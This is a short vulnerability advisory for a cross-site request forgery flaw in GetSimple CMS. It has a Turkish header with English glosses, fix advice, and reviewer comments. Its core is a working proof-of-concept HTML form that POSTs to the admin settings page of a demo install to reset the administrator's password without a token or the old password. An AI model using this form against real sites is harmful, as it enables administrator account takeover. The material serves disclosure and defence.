< ------------------- header data start ------------------- >

#############################################################

# Application Name : GetSimple CMS

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Impact : Admin sifresi degistirilebilir ! (English: the admin password can be changed.)

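# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir, Eski sifre sorulmalidir .. (English: a session token must be added to the form, and the old password must be asked for before it is changed.)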

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >


<!--
  Proof-of-concept form from the advisory: a plain HTML POST to
  admin/settings.php on the public demo install, submitting the fields
  user, email, sitepwd, sitepwd_confirm and submitted.

  What a reviewer should notice is what the form does NOT contain:
    - no per-session anti-CSRF token field, and
    - no current-password field.
  Per the advisory header (XSRF), the settings handler accepts the request
  without either, so the fix belongs on the server side: reject the POST
  unless it carries a valid token bound to the admin session, and require
  the current password before accepting a new one. Origin/Referer
  validation and SameSite session cookies are defence in depth, not a
  substitute for the token.

  To verify a fix, replay the same POST without the token and confirm the
  server refuses it and leaves the stored credentials unchanged.
-->
<form class=largeform action=http://demo.opensourcecms.com/getsimple/admin/settings.php method=post >
<input class=text name=user type=text value=admin /><br>
<!-- NOTE(review): "[email protected]" looks like an e-mail obfuscation placeholder left by the hosting page, not the author's original value. -->
<input class=text name=email type=text value=[email protected] /><br>
<!-- The two password fields below are the security-relevant ones: "(Sifre)" = password, "(Tekrar Sifre)" = repeat password. -->
<input class=text name=sitepwd type=password value= />(Sifre)<br>
<input class=text name=sitepwd_confirm type=password value= />(Tekrar Sifre)<br>
<!-- "Kaydet" = Save. The attribute value is unquoted, so "!" is not part of it as written. -->
<input class=submit type=submit name=submitted value=Kaydet ! />
</form>

< -- bug code end of -- >